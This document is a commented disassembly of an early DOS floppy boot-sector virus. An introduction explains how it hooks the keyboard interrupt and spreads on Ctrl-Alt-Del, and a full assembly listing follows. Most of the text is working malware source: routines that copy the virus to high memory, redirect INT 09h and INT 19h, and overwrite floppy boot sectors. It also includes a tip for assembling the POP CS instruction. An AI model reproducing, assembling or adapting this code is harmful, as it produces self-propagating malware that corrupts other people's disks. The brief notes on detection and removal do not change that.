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[2.9]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virus is of the "FLOPPY ONLY" variety.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It replicates to the boot sector of a floppy disk and when it gains contro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t will move itself to upper memory.  It redirects the keyboard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terrupt (INT 09H) to look for ALT-CTRL-DEL sequences at which time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t will attempt to infect any floppy it finds in drive A:.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t keeps the real boot sector at track 39, sector 8, head 0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t does not map this sector bad in the fat (unlike the Pakistani Br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nd should that area be used by a file, the virus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ill die.  It also contains no anti detection mechanisms as does the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RAIN virus.  It apparently uses head 0, sector 8 and not head 1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ector 9 because this is common to all floppy formats both single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sided and double sided.  It does not contain any malevolent TROJAN    ;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HORSE code.  It does appear to contain a count of how many times it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has infected other diskettes although this is harmless and the count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s never accessed.            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ngs to note about this virus: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t can not only live through an ALT-CTRL-DEL reboot command, but this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s its primary (only for that matter) means of reproduction to other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loppy diskettes.  The only way to remove it from an infected system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s to turn the machine off and reboot an uninfected copy of DOS.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t is even resident when no floppy is booted but BASIC is loaded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stead.  Then when ALT-CTRL-DEL is pressed from inside of BASIC,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t activates and infectes the floppy from which the user is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ttempting to boot.           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lso note that because of the POP CS command to pass control to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ts self in upper memory, this virus does not to work on 80286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chines (because this is not a valid 80286 instruction).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f your assembler will not allow the POP CS command to execute, repl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POP CS command with an NOP and then assemble it, then debug that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art of the code and place POP CS in place of NOP at that section.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Norton Utilities can be used to identify infected diskettes by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ooking at the boot sector and the DOS SYS utility can be used to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move it (unlike the Pakistani Brain).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  7C00H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 LABEL     WORD           ;TOP OF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1. Find top of memory and copy ourself up there. (keeping same off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2. Save a copy of the first 32 interrupt vectors to top of memory too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3. Redirect int 9 (keyboard) to ourself in top of memory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4. Jump to ourself at top of memory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5. Load and execute REAL boot sector from track 40, head 0, sector 8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:   CLI                 ;INITIALIZ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OR  AX,AX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SS,AX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SP,offset TOS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BX,0040H       ;ES = TOP OF MEMORY - (7C00H+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DS,BX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AX,[0013H]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  BX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  AX,07E0H       ;   (7C00H+512)/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ES,AX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CS             ;DS = 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  DS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P  DI,3456H       ;IF THE VIRUS IS REBOOT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NE  B_10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  Word Ptr [COUNTER_1]     ;...LOW&amp;HI:COUNTER_1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B_10:    MOV  SI,SP     ;SP=7C00  ;COPY SELF TO TOP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DI,SI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CX,512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D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  MOVSB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SI,CX     ;CX=0          ;SAVE FIRST 32 INT VETOR ADDR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DI,offset BEGIN - 128    ;   128 BYTES BELOW OUR H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CX,128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  MOVSB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PUT_NEW_09          ;SAVE/REDIRECT INT 9 (KEY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ES   ;ES=HI    ;   JUMP TO OUR HI C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  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DS   ;DS=0     ;   ES =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  ES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BX,SP          ;   SP=7C00  ;LOAD REAL BOOT SECTOR TO 0000:7C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DX,CX          ;CX=0        ;DRIVE A: HEA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CX,2708H       ;   TRACK 40, SECTOR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AX,0201H       ;   READ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13H            ;   (common to 8/9 sect. 1/2 sid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B   $              ;   HANG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MP  JMP_BOOT       ;JMP 0000:7C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AVE THEN REDIRECT INT 9 VECTOR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N ENTRY:   DS = 0            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ES = WHERE TO SAVE OLD_09 &amp; (HI)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WHERE NEW_09 IS         (HI)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_NEW_09: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  Word Ptr [0413H]    ;TOP OF MEMORY (0040:0013) -=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SI,9*4              ;COPY INT 9 VEC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DI,offset OLD_09    ;   OLD_09 (IN OUR HI COD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CX,0004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  MOVSB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Word Ptr [9*4],offset NEW_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[(9*4)+2],ES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SET KEYBOARD, TO ACKNOWLEDGE LAST CHAR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_KEYBD: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 AL,61H              ;RESET KEYBOARD THEN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AH,AL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 AL,80H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 61H,AL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CHG AL,AH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 61H,AL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MP  RBOOT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ATA AREA WHICH IS NOT USED IN THIS VERSION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ASON UNKNOWN                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   DB   27H,0,1,2      ;FORMAT INFORMATION FOR TRACK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   27H,0,2,2      ;   (CURRENTLY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   27H,0,3,2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   27H,0,4,2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   27H,0,5,2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   27H,0,6,2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   27H,0,7,2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   27H,0,8,2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A7C9A   LABEL     BYTE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   00024H              ;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   0ADH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   07CH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   0A3H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   00026H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L7CA1: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  CX             ;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  DI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  SI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  ES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  DS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  AX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F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MP  1111:1111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F ALT &amp; CTRL &amp; DEL THEN ...  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F ALT &amp; CTRL &amp; ? THEN ...    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09:  PUSHF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AX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BX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DS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CS             ;DS=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  DS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BX,[ALT_CTRL W]     ;BX=SCAN CODE LA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 AL,60H              ;GET SCA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AH,AL               ;SAVE IN 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AX,887FH       ;STRIP 8th BIT IN AL, KEEP 8th BIT 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P  AL,1DH              ;IS IT A [CTRL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NE  N09_10              ;...JUMP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BL,AH               ;(BL=08 ON KEY DOWN, BL=88 ON KEY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MP  N09_30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_10:  CMP  AL,38H              ;IS IT AN [ALT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NE  N09_20              ;...JUMP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BH,AH               ;(BH=08 ON KEY DOWN, BH=88 ON KEY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MP  N09_30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_20:  CMP  BX,0808H       ;IF (CTRL DOWN &amp; ALT DOWN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NE  N09_30              ;...JUMP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P  AL,17H              ;IF [I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   N09_X0              ;...JUMP IF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P  AL,53H              ;IF [DEL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   ACK_KEYBD      ;...JUMP IF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_30:  MOV  [ALT_CTRL],BX       ;SAVE SCAN CODE FOR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_90:  POP  DS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  BX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  AX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F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   0EAH           ;JMP F000:E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09   DW   ?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   0F000H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_X0:  JMP  N09_X1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;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OT:   MOV  DX,03D8H       ;DISABLE COLOR VIDEO !?!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AX,0800H       ;AL=0, AH=DELAY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 DX,AL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DELAY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[ALT_CTRL],AX  ;AX=0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AL,3 ;AH=0          ;SELECT 80x25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10H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AH,2           ;SET CURSOR POS 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OR  DX,DX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BH,DH               ;   PAG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10H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AH,1           ;SET CURS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CX,0607H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10H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AX,0420H       ;DELAY (AL=20H FOR EOI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DELAY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 20H,AL              ;SEND EOI TO IN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ES,CX     ;CX=0 (DELAY)  ;RESTORE FIRST 32 INT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DI,CX               ;   (REMOVING OUR INT 09 HANDL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SI,offset BEGIN - 128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CX,128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D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  MOVSB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DS,CX     ;CX=0          ;DS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Word Ptr [19H*4],offset NEW_19 ;SET INT 19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[(19H*4)+2],CS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AX,0040H       ;DS = ROM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DS,AX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[0017H],AH     ;AH=0     ;KBFLAG (SHIFT STATES)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  Word Ptr [0013H]    ;MEMORY SIZE += 1024 (WERE NOT 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DS             ;IF BIOS F000:E502 == 21E4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AX,0F000H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DS,AX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P  Word Ptr [0E502H],21E4H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  DS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   R_90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19H            ;   IF NOT...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R_90:    JMP  0F000:0E502H        ;...DO IT ?!?!?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BOOT INT VECTOR             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19:  XOR  AX,AX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DS,AX               ;DS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AX,[0410]      ;AX=EQUIP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AL,1           ;IF FLOPPY DRIVE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NZ  N19_20              ;...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_10:  PUSH CS             ;ELSE ES=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  ES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PUT_NEW_09          ;SAVE/REDIRECT INT 9 (KEY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18H            ;LOAD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_20:  MOV  CX,0004             ;RETRY COUNT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_22:  PUSH CX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AH,00               ;RESE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13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B   N19_81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AX,0201             ;READ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DS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  ES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BX,offset BEGIN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CX,1           ;TRACK 0, SECT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13H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_81:  POP  CX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NB  N19_90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 N19_22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MP  N19_10              ;IF RETRY EXPIRED...LOAD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infection segment.          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;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_90:  CMP  DI,3456             ;IF NOT FLAG S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NZ  RE_INFECT      ;...RE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_BOOT:                    ;PASS CONTROL TO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MP  0000:7C00H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infection Segment.          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_INFECT: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SI,offset BEGIN          ;COMPARE BOOT SECTOR JUST LOA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CX,00E6H       ;   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DI,SI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CS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  ES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D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 CMPSB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   RI_12               ;IF NOT EQU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  Word Ptr ES:[COUNTER_1]  ;INC. COUNTER IN OUR CODE (NOT D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MAKE SURE TRACK 39, HEAD 0 FORMATTED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BX,offset TABLE          ;FORMA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DX,0000             ;DRIVE A: HEA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CH,40-1             ;TRACK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AH,5           ;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MP  RI_10               ;REMOVE THE FORMAT OPTION FOR NOW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&lt;&lt; NO EXECUTION PATH TO HERE &gt;&gt;&gt;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B   RI_80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WRITE REAL BOOT SECTOR AT TRACK 39, SECTOR 8, HEA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_10:   MOV  ES,DX               ;ES:BX = 0000:7C00, HEAD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BX,offset BEGIN          ;TRACK 4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CL,8           ;SECTOR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AX,0301H       ;WRITE 1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13H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CS             ;   (ES=CS FOR PUT_NEW_09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  ES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B   RI_80               ;IF WRITE ERROR...JUMP TO BOO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CX,0001             ;WRITE INFECTED BOOT SECTO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AX,0301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13H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B   RI_80               ;   IF ERROR...JUMP TO BOO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RI_12:   MOV  DI,3456H       ;SET "JUST INFECTED ANOTHER ONE"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19H            ;...FLAG AND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RI_80:   CALL PUT_NEW_09          ;SAVE/REDIRECT INT 9 (KEY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  Word Ptr ES:[COUNTER_1]  ;   (DEC. CAUSE DIDNT INF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MP  JMP_BOOT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;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_X1:  MOV  [ALT_CTRL],BX       ;SAVE ALT &amp; CTRL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AX,[COUNTER_1]      ;PUT COUNTER_1 INTO RESE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BX,0040H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DS,BX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[0072H],AX          ;   0040:0072 = RESE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MP  N09_90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LAY                         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N ENTRY    AH:CX = LOOP COUNT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:   SUB  CX,CX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D_01:    LOOP $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  AH,1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NZ  D_01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F4         DB   27H,00H,8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ER_1     DW   00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_CTRL      DW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FC         DB   27H,0,8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